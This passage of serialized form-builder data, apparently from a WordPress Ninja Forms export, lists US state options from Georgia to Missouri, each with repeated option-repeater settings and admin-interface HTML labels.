Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:11;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";i:0;s:5:\"label\";s:7:\"Georgia\";s:5:\"value\";s:2:\"GA\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:12;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";i:0;s:5:\"label\";s:6:\"Hawaii\";s:5:\"value\";s:2:\"HI\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:13;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";i:0;s:5:\"label\";s:5:\"Idaho\";s:5:\"value\";s:2:\"ID\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:14;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";i:0;s:5:\"label\";s:8:\"Illinois\";s:5:\"value\";s:2:\"IL\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:15;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";i:0;s:5:\"label\";s:7:\"Indiana\";s:5:\"value\";s:2:\"IN\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:16;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";i:0;s:5:\"label\";s:4:\"Iowa\";s:5:\"value\";s:2:\"IA\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:17;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";i:0;s:5:\"label\";s:6:\"Kansas\";s:5:\"value\";s:2:\"KS\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:18;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";i:0;s:5:\"label\";s:8:\"Kentucky\";s:5:\"value\";s:2:\"KY\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:19;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";i:0;s:5:\"label\";s:9:\"Louisiana\";s:5:\"value\";s:2:\"LA\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:20;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";i:0;s:5:\"label\";s:5:\"Maine\";s:5:\"value\";s:2:\"ME\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:21;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";i:0;s:5:\"label\";s:8:\"Maryland\";s:5:\"value\";s:2:\"MD\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:22;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";i:0;s:5:\"label\";s:13:\"Massachusetts\";s:5:\"value\";s:2:\"MA\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:23;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";i:0;s:5:\"label\";s:8:\"Michigan\";s:5:\"value\";s:2:\"MI\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:24;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";i:0;s:5:\"label\";s:9:\"Minnesota\";s:5:\"value\";s:2:\"MN\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:25;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";i:0;s:5:\"label\";s:11:\"Mississippi\";s:5:\"value\";s:2:\"MS\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:26;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";i:0;s:5:\"label\";s:8:\"Missouri\";s:5:\"value\";s:2:\"MO\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons 